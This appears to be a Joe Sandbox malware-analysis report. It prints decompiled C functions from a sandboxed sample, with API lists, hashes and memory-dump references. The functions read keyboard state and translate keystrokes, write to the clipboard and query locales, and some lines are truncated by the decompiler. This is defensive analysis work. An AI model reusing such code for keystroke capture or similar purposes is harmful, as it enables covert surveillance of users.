Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Service$CloseErrorHandleLastOpen$CreateDeleteManager
String ID: C:\DownLoad-Helper\x64_Defender.dat
API String ID: 659314810-2475795899
Opcode ID: 670433a1edffaec567fed73a7c71f5faf7565debac92245b08225dbbe384d46e
Instruction ID: 193e0da349b36b1d8e4f1ce816ab782d3007887534a08323ee20211a06bd7942
Opcode Fuzzy Hash: 670433a1edffaec567fed73a7c71f5faf7565debac92245b08225dbbe384d46e
Instruction Fuzzy Hash: 3F219131604326ABCB115FB6AD98EFE7E78EB4AB64B184058F561F2250CB60CE04E670

Uniqueness

Uniqueness Score: -1.00%

Function 00D2428E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 161
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00D2428E(void* __ebx, signed int __edx, void* __edi, int* _a4) {
				signed short _v0;
				struct HINSTANCE__* _v4;
				signed int _v8;
				struct HINSTANCE__* _v12;
				struct tagACCEL* _v16;
				signed int _v20;
				char _v264;
				short _v268;
				char _v276;
				char _v279;
				char _v280;
				short _v284;
				int _v308;
				signed int _v320;
				void* __esi;
				void* __ebp;
				signed int _t55;
				struct tagACCEL* _t63;
				struct tagACCEL* _t71;
				struct tagACCEL* _t76;
				int _t77;
				signed int _t79;
				struct HKL__* _t86;
				int _t92;
				signed int _t97;
				struct tagACCEL* _t99;
				void* _t101;
				struct HACCEL__* _t103;
				struct HKL__* _t107;
				int _t109;
				signed short _t115;
				void* _t119;
				void* _t121;
				void* _t123;
				signed int _t149;
				signed int _t150;
				struct HINSTANCE__* _t152;
				int _t154;
				void* _t155;
				signed short _t159;
				struct HACCEL__* _t161;
				void* _t163;
				void* _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;

				_t149 = __edx;
				_t55 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t55 ^ _t167;
				if(GetKeyboardState( &_v264) == 0) {
					E00CAA4E7(__ebx, _t117, __edi, _t157, __eflags);
					asm("int3");
					_push(_t167);
					_t168 = _t171;
					_push(_t117);
					_push(_t117);
					_push(__ebx);
					_push(_t157);
					_t113 = _t117;
					_push(__edi);
					_v276 = _t117;
					_t152 =  *( *((intOrPtr*)(E00CACEEE(_t117, __edi, _t157, __eflags) + 4)) + 0x5c);
					__eflags = _t152;
					if(__eflags == 0) {
						L10:
						_t63 = E00CACA6C("$?\xef\xbf\xbd", E00CAC659(_t117, _t157, __e						_pop(_t119);
						__eflags = _t63;
						if(_t63 != 0) {
							__eflags =  *(_t63 + 0x8c);
							if(__eflags != 0) {
								_t63 = E00CACA6C(0xe283a8, E00CAC659(_t119, _t157, __eflags));
								_pop(_t121);
								__eflags = _t63;
								if(__eflags == 0) {
									_t63 = E00CACA6C(0xe27e18, E00CAC659(_t121, _t157, __eflags));
									_pop(_t123);
									__eflags = _t63;
									if(__eflags == 0) {
										_t63 = E00CACA6C(0xe289b8, E00CAC659(_t123, _t157, __eflags));
										__eflags = _t63;
										if(_t63 != 0) {
											_t159 =  *(_t63 + 0x1b4);
											goto L18;
										}
									} else {
										_t159 =  *(_t63 + 0x140);
										goto L18;
									}
								} else {
									_t159 =  *(_t63 + 0x35c);
									L18:
									__eflags = _t159;
									if(__eflags != 0) {
										_t63 = LoadAcceleratorsW( *(E00CACEEE(_t113, _t152, _t159, __eflags) + 0xc), _t159 & 0x0000ffff);
										__eflags = _t63;
										if(_t63 != 0) {
											_push(0);
											_push(_t63);
											_t63 = E00D245A7(_t113, _t152, _t159, 0);
										}
									}
								}
							}
						}
						return _t63;
					} else {
						_t157 =  *(_t152->i + 0x10);
						 *0xe17a64();
						_t117 = _t152;
						_t71 =  *( *(_t152->i + 0x10))();
						_v16 = _t71;
						__eflags = _t71;
						while(__eflags != 0) {
							 *0xe17a64( &_v16);
							_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t152->i + 0x14))))();
							_t117 = _t157;
							_t76 = E00CACB0B(_t157, 0xe33b00);
							__eflags = _t76;
							if(_t76 == 0) {
								goto L9;
							} else {
								__eflags =  *(_t157 + 0x8c);
								if( *(_t157 + 0x8c) == 0) {
									goto L9;
								} else {
									_t115 =  *(_t157 + 0x54);
									__eflags = _t115;
									if(__eflags == 0) {
										_t77 = E00CAA4E7(_t115, _t117, _t152, _t157, __eflags);
										asm("int3");
										_push(_t168);
										_t169 = _t171;
										_push(_t115);
										_push(_t157);
										_t161 = _v280;
										_push(_t152);
										__eflags = _t161;
										if(__eflags == 0) {
											L32:
											E00CAA4E7(_t115, _t117, _t152, _t161, __eflags);
											asm("int3");
											_push(_t169);
											_t170 = _t171;
											_t79 =  *0xe68dd4; // 0x8d2643c2
											_v320 = _t79 ^ _t170;
											_push(_t161);
											_push(_t152);
											_t154 = _v308;
											__eflags = _t154 - 0x60 - 9;
											if(__eflags > 0) {
												L35:
												__eflags =  *0xe8736c;
												if( *0xe8736c != 0) {
													goto L40;
												} else {
													__eflags = _t154 - 0x41 - 0x19;
													if(__eflags <= 0) {
														L39:
														_t92 = _t154;
													} else {
														GetAsyncKeyState(0x12);
														asm("bt ax, 0xf");
														if(__eflags < 0) {
															goto L39;
														} else {
															_t92 = E00DF0F03(_t154);
														}
													}
												}
											} else {
												GetAsyncKeyState(0x12);
												asm("bt ax, 0xf");
												if(__eflags >= 0) {
													L40:
													__eflags = 0;
													_v284 = 0;
													GetKeyboardState( &_v276);
													_t86 = GetKeyboardLayout( *(E00CAC67F() + 0x30));
													ToAsciiEx(_t154, MapVirtualKeyA(_t154, 0),  &_v276,  &_v284, 1, _t86);
													_v280 = _v284;
													_v279 = 0;
													CharUpperA( &_v280);
													_t92 = _v280;
												} else {
													goto L35;
												}
											}
											_pop(_t155);
											__eflags = _v20 ^ _t170;
											_pop(_t163);
											return E00DDCBCE(_t92, _t115, _v20 ^ _t170, _t149, _t155, _t163);
										} else {
											_t115 = _v0;
											_t152 = _v4;
											__eflags = _t161 -  *_t115;
											if(_t161 !=  *_t115) {
												__eflags = _t152->i;
												if(__eflags != 0) {
													L00CA95BB(_t152->i);
													_t152->i = _t152->i & 0x00000000;
													__eflags = _t152->i;
												}
												_t97 = CopyAcceleratorTableA(_t161, 0, 0);
												_t150 = 6;
												 *_a4 = _t97;
												_t149 = _t97 * _t150 >> 0x20;
												_push( ~(0 | __eflags > 0x00000000) | _t97 * _t150);
												_t99 = E00CA95C0(__eflags);
												_t152->i = _t99;
												_pop(_t117);
												__eflags = _t99;
												if(__eflags == 0) {
													goto L32;
												} else {
													_t77 = CopyAcceleratorTableA(_t161, _t99,  *_a4);
													 *_t115 = _t161;
													goto L31;
												}
											} else {
												__eflags =  *_t152;
												if(__eflags == 0) {
													goto L32;
												} else {
													L31:
													return _t77;
												}
											}
										}
									} else {
										_t101 = E00CACEEE(_t115, _t152, _t157, __eflags);
										_t117 =  *(_t101 + 0xc);
										_t103 = LoadAcceleratorsW( *(_t101 + 0xc), _t115 & 0x0000ffff);
										_t113 = _v12;
										__eflags = _t103;
										if(_t103 != 0) {
											_push(0);
											_push(_t103);
											_t117 = _t113;
											E00D245A7(_t113, _t152, _t157, _t157);
										}
										goto L9;
									}
								}
							}
							goto L42;
							L9:
							__eflags = _v16;
						}
						goto L10;
					}
				} else {
					_v268 = 0;
					_t107 = GetKeyboardLayout( *(E00CAC67F() + 0x30));
					_t109 = ToAsciiEx(_a4, MapVirtualKeyA(_a4, 0),  &_v264,  &_v268, 0, _t107);
					_t166 = _t157;
					return E00DDCBCE(0 | _t109 > 0x00000000, __ebx, _v8 ^ _t167, _t149, __edi, _t166);
				}
				L42:
			}

0x00d2428e
0x00d24297
0x00d2429e
0x00d242b0
0x00d2430a
0x00d2430f
0x00d24310
0x00d24311
0x00d24313
0x00d24314
0x00d24315
0x00d24316
0x00d24317
0x00d24319
0x00d2431a
0x00d24325
0x00d24328
0x00d2432a
0x00d243aa
0x00d243b5
0x00d243bb
0x00d243bc
0x00d243be
0x00d243c4
0x00d243cb
0x00d243d8
0x00d243de
0x00d243df
0x00d243e1
0x00d243f6
0x00d243fc
0x00d243fd
0x00d243ff
0x00d24414
0x00d2441b
0x00d2441d
0x00d2441f
0x00000000
0x00d2441f
0x00d24401
0x00d24401
0x00000000
0x00d24401
0x00d243e3
0x00d243e3
0x00d24425
0x00d24425
0x00d24427
0x00d24436
0x00d2443c
0x00d2443e
0x00d24440
0x00d24442
0x00d24447
0x00d24447
0x00d2443e
0x00d24427
0x00d243e1
0x00d243cb
0x00d24450
0x00d2432c
0x00d2432e
0x00d24333
0x00d24339
0x00d2433b
0x00d2433d
0x00d24340
0x00d24342
0x00d2434f
0x00d24359
0x00d24360
0x00d24362
0x00d24367
0x00d24369
0x00000000
0x00d2436b
0x00d2436b
0x00d24372
0x00000000
0x00d24374
0x00d24374
0x00d24377
0x00d24379
0x00d24451
0x00d24456
0x00d24457
0x00d24458
0x00d2445a
0x00d2445b
0x00d2445c
0x00d2445f
0x00d24460
0x00d24462
0x00d244c6
0x00d244c6
0x00d244cb
0x00d244cc
0x00d244cd
0x00d244d5
0x00d244dc
0x00d244df
0x00d244e0
0x00d244e1
0x00d244e7
0x00d244ea
0x00d244fb
0x00d244fb
0x00d24502
0x00000000
0x00d24504
0x00d24507
0x00d2450a
0x00d24524
0x00d24524
0x00d2450c
0x00d2450e
0x00d24514
0x00d24519
0x00000000
0x00d2451b
0x00d2451c
0x00d24521
0x00d24519
0x00d2450a
0x00d244ec
0x00d244ee
0x00d244f4
0x00d244f9
0x00d24528
0x00d24528
0x00d2452a
0x00d24538
0x00d24546
0x00d2456a
0x00d24576
0x00d24583
0x00d2458a
0x00d24590
0x00000000
0x00000000
0x00000000
0x00d244f9
0x00d2459a
0x00d2459b
0x00d2459d
0x00d245a4
0x00d24464
0x00d24464
0x00d24467
0x00d2446a
0x00d2446c
0x00d24475
0x00d24478
0x00d2447c
0x00d24481
0x00d24481
0x00d24484
0x00d2448a
0x00d24495
0x00d24496
0x00d2449a
0x00d244a3
0x00d244a4
0x00d244a9
0x00d244ab
0x00d244ac
0x00d244ae
0x00000000
0x00d244b0
0x00d244b7
0x00d244bd
0x00000000
0x00d244bd
0x00d2446e
0x00d2446e
0x00d24471
0x00000000
0x00d24473
0x00d244bf
0x00d244c3
0x00d244c3
0x00d24471
0x00d2446c
0x00d2437f
0x00d2437f
0x00d24384
0x00d2438c
0x00d24392
0x00d24395
0x00d24397
0x00d24399
0x00d2439b
0x00d2439d
0x00d2439f
0x00d2439f
0x00000000
0x00d24397
0x00d24379
0x00d24372
0x00000000
0x00d243a4
0x00d243a4
0x00d243a4
0x00000000
0x00d24342
0x00d242b2
0x00d242b5
0x00d242c4
0x00d242ec
0x00d242f6
0x00d24307
0x00d24307
0x00000000

APIs

GetKeyboardState.USER32(?), ref: 00D242A8
GetKeyboardLayout.USER32(?), ref: 00D242C4
MapVirtualKeyA.USER32 ref: 00D242D1
ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00D242EC
LoadAcceleratorsW.USER32 ref: 00D2438C
LoadAcceleratorsW.USER32 ref: 00D24436

Strings

$?, xrefs: 00D243B0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AcceleratorsKeyboardLoad$AsciiLayoutStateVirtual
String ID: $?
API String ID: 40748678-773356789
Opcode ID: c4c2821b85dc6ce5985955921a76855ed0d2248ee33441731044c6cced3c7fe2
Instruction ID: 0a8085da818ba9e22a4fb34880ad0f380132dd2adbdc6c2844db41675accc8c0
Opcode Fuzzy Hash: c4c2821b85dc6ce5985955921a76855ed0d2248ee33441731044c6cced3c7fe2
Instruction Fuzzy Hash: 5141C031200226AFDB18EB65EC8ABBE37A8AF14718F1840A9F845E7191DF70DD00DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D7A59D Relevance: 12.1, APIs: 8, Instructions: 118
clipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D7A59D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t60;
				struct HBRUSH__* _t61;
				intOrPtr _t67;
				int _t70;
				int _t82;
				int _t98;
				struct HDC__* _t100;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_t96 = __edx;
				E00DDD5CB(0xe11579, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t102 - 0x34)) = __ecx;
				_t100 = 0;
				 *((intOrPtr*)(_t102 - 4)) = 0;
				E00CB90E5(__ebx, _t102 - 0x58, __edx, __edi, 0, _t103, 0, 0x4c);
				 *((char*)(_t102 - 4)) = 1;
				_t98 =  *(E00CC19ED() + 0x114);
				 *(_t102 - 0x30) = _t98;
				_t82 =  *(E00CC19ED() + 0x118);
				E00CB9032(_t102 - 0x44);
				 *((char*)(_t102 - 4)) = 2;
				E00CB9B84(_t82, _t102 - 0x44, CreateCompatibleDC(0));
				 *((intOrPtr*)(_t102 - 0x28)) = 0;
				 *((intOrPtr*)(_t102 - 0x2c)) = 0xe196b4;
				 *((char*)(_t102 - 4)) = 3;
				if(E00CB9BC6(_t82, _t102 - 0x2c, _t98, CreateCompatibleBitmap( *(_t102 - 0x54), _t98, _t82)) == 0) {
					L7:
					_push(0xffffffff);
					_push(_t100);
					_push(0x3e8a);
					E00CADD79(_t82, _t96, _t98, _t100, _t107);
					 *((intOrPtr*)(_t102 - 0x2c)) = 0xe196b4;
					E00CB91F0(_t102 - 0x2c, _t96);
					E00CB91A4(_t102 - 0x44);
					E00CB9360(_t102 - 0x58);
					L8:
					return E00DDD51D(_t82, _t98, _t100);
				}
				_t98 = E00CBA251( *(_t102 - 0x40),  *((intOrPtr*)(_t102 - 0x28)));
				 *(_t102 - 0x24) = 0;
				 *((intOrPtr*)(_t102 - 0x20)) = 0;
				 *(_t102 - 0x1c) =  *(_t102 - 0x30);
				 *(_t102 - 0x18) = _t82;
				_t60 = E00CC19ED() + 0x98;
				if(_t60 != 0) {
					_t61 =  *(_t60 + 4);
				} else {
					_t61 = 0;
				}
				FillRect( *(_t102 - 0x40), _t102 - 0x24, _t61);
				_t91 =  *((intOrPtr*)(_t102 - 0x34));
				E00D7A75F( *((intOrPtr*)(_t102 - 0x34)), _t96, _t102 - 0x44, _t102 - 0x24);
				_t67 = _t100;
				_t106 = _t98;
				if(_t98 != 0) {
					_t67 =  *((intOrPtr*)(_t98 + 4));
				}
				E00CBA251( *(_t102 - 0x40), _t67);
				_t70 = OpenClipboard( *(E00CAC659(_t91, _t100, _t106) + 0x20));
				_t107 = _t70;
				if(_t70 != 0) {
					__eflags = EmptyClipboard();
					if(__eflags != 0) {
						__eflags = SetClipboardData(2, E00CB9D20(_t82, _t102 - 0x2c));
						if(__eflags == 0) {
							_push(0xffffffff);
							_push(_t100);
							_push(0x3e8a);
							E00CADD79(_t82, _t96, _t98, _t100, __eflags);
						}
						_t100 = 1;
						__eflags = 1;
						L14:
						CloseClipboard();
						 *((intOrPtr*)(_t102 - 0x2c)) = 0xe196b4;
						E00CB91F0(_t102 - 0x2c, _t96);
						E00CB91A4(_t102 - 0x44);
						E00CB9360(_t102 - 0x58);
						goto L8;
					}
					_push(0xffffffff);
					_push(_t100);
					_push(0x3e8a);
					E00CADD79(_t82, _t96, _t98, _t100, __eflags);
					goto L14;
				} else {
					goto L7;
				}
			}

0x00d7a59d
0x00d7a59d
0x00d7a5a4
0x00d7a5a9
0x00d7a5ac
0x00d7a5b2
0x00d7a5b5
0x00d7a5ba
0x00d7a5c3
0x00d7a5c9
0x00d7a5d4
0x00d7a5da
0x00d7a5e0
0x00d7a5ee
0x00d7a5f3
0x00d7a5f6
0x00d7a602
0x00d7a617
0x00d7a68a
0x00d7a68a
0x00d7a68c
0x00d7a68d
0x00d7a692
0x00d7a69a
0x00d7a6a1
0x00d7a6a9
0x00d7a6b1
0x00d7a6b8
0x00d7a6bd
0x00d7a6bd
0x00d7a624
0x00d7a626
0x00d7a62c
0x00d7a62f
0x00d7a632
0x00d7a63a
0x00d7a63f
0x00d7a645
0x00d7a641
0x00d7a641
0x00d7a641
0x00d7a650
0x00d7a656
0x00d7a661
0x00d7a666
0x00d7a668
0x00d7a66a
0x00d7a66c
0x00d7a66c
0x00d7a673
0x00d7a680
0x00d7a686
0x00d7a688
0x00d7a6c4
0x00d7a6c6
0x00d7a6e8
0x00d7a6ea
0x00d7a6ec
0x00d7a6ee
0x00d7a6ef
0x00d7a6f4
0x00d7a6f4
0x00d7a6fb
0x00d7a6fb
0x00d7a6fc
0x00d7a6fc
0x00d7a705
0x00d7a70c
0x00d7a714
0x00d7a71c
0x00000000
0x00d7a721
0x00d7a6c8
0x00d7a6ca
0x00d7a6cb
0x00d7a6d0
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D7A5A4

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

CreateCompatibleDC.GDI32(00000000), ref: 00D7A5E4
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00D7A606

Part of subcall function 00CBA251: SelectObject.GDI32(0000005C,?), ref: 00CBA25A

FillRect.USER32 ref: 00D7A650
OpenClipboard.USER32(?), ref: 00D7A680
EmptyClipboard.USER32 ref: 00D7A6BE
SetClipboardData.USER32(00000002,00000000), ref: 00D7A6E2
CloseClipboard.USER32(00003E8A,00000000,000000FF), ref: 00D7A6FC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
String ID:
API String ID: 2940850299-0
Opcode ID: 00eba20dec51118ce8966ff0f5bd682c710f95c164105a6c30dc5b2c3327392d
Instruction ID: bbf453174a02cc2503a6b609c60cd1a3e869760a9102be51c1baefb7837ceb57
Opcode Fuzzy Hash: 00eba20dec51118ce8966ff0f5bd682c710f95c164105a6c30dc5b2c3327392d
Instruction Fuzzy Hash: 8B418F71D041199FCB00EFE9CC46AEDBBB8EF59700F148119F516B6292EB309A05EB71

Uniqueness

Uniqueness Score: -1.00%

Function 00E0065F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00E0065F(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E00DF4B3D(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00DF4B3D(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0xe43f24; // 0x17
					E00E005FE(_t89, 0, 0xe43e10, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00DFFFA0(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00E00086(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E00E0048A(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E00DDCBCE(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E00DF53FC(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E00DF53FC(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E00DEB62B(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0xe43e0c; // 0x41
						_t75 = E00E005FE(_t89, _t97, "(?\xef\xbf\xbd", _t73 - 1						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00E00086(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E00DFFFEB(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E00DFFFEB(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00e00667
0x00e0066e
0x00e00675
0x00e00679
0x00e0067d
0x00e0068b
0x00e00690
0x00e00691
0x00e00692
0x00e00693
0x00e0069b
0x00e0069d
0x00e006a3
0x00e006a9
0x00e006ac
0x00e006ae
0x00e006b1
0x00e006b5
0x00e006bc
0x00e006c9
0x00e006ce
0x00e006d1
0x00e006d4
0x00e006d4
0x00e006d6
0x00e006d9
0x00e006dd
0x00e0074d
0x00e0074f
0x00e00751
0x00e00764
0x00e00764
0x00e0076b
0x00e00771
0x00e00774
0x00000000
0x00e00774
0x00e00753
0x00e00756
0x00000000
0x00000000
0x00e0075c
0x00e00761
0x00000000
0x00e006e4
0x00e006e4
0x00e006e8
0x00e006fa
0x00e006fe
0x00e00703
0x00e00707
0x00e00708
0x00e00790
0x00e00790
0x00e00792
0x00e0079e
0x00e007a8
0x00e007ac
0x00e007ae
0x00e0077f
0x00e0077f
0x00e00781
0x00e0078f
0x00e0078f
0x00e007b4
0x00e007ba
0x00e007bc
0x00000000
0x00000000
0x00e007c3
0x00e007c9
0x00e007cb
0x00000000
0x00000000
0x00e007cd
0x00e007d0
0x00e007d2
0x00e007d4
0x00e007d4
0x00e007e5
0x00e007ea
0x00e007ec
0x00e0084c
0x00e0084e
0x00000000
0x00e0084e
0x00e007f1
0x00e007fb
0x00e0080b
0x00e00811
0x00e00813
0x00000000
0x00000000
0x00e0081b
0x00e0082a
0x00e00830
0x00e00832
0x00000000
0x00000000
0x00e0083c
0x00e00844
0x00000000
0x00e00849
0x00e0070e
0x00e0071d
0x00e00722
0x00e00727
0x00e00777
0x00e00777
0x00e00777
0x00e00779
0x00e0077d
0x00000000
0x00000000
0x00000000
0x00e0077d
0x00e00729
0x00e0072b
0x00e0072f
0x00e00741
0x00e00745
0x00e0074a
0x00e0074a
0x00000000
0x00e0074a
0x00e00731
0x00e00734
0x00000000
0x00000000
0x00e0073a
0x00000000
0x00e0073a
0x00e006ea
0x00e006ed
0x00000000
0x00000000
0x00e006f3
0x00000000
0x00e006f3

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4B9F
Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4BD5

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00E0076B
IsValidCodePage.KERNEL32(00000000), ref: 00E007B4
IsValidLocale.KERNEL32(?,00000001), ref: 00E007C3
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00E0080B
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00E0082A

Strings

(?, xrefs: 00E00718

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: (?
API String ID: 949163717-3957887476
Opcode ID: 2f020501e8ed8d6683b07fc221a54b1ddf7b23495a2d28247619cddeba166436
Instruction ID: 1ff07611357915aab598d74d8cd80000d9296d1fa7e680fab5eae3e71dc9d511
Opcode Fuzzy Hash: 2f020501e8ed8d6683b07fc221a54b1ddf7b23495a2d28247619cddeba166436
Instruction Fuzzy Hash: 2C517D71A00209AFDB20EFA5DC41BBA77B8EF14704F18546AE914F7191E7B4AA84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E0048A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00E0048A(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
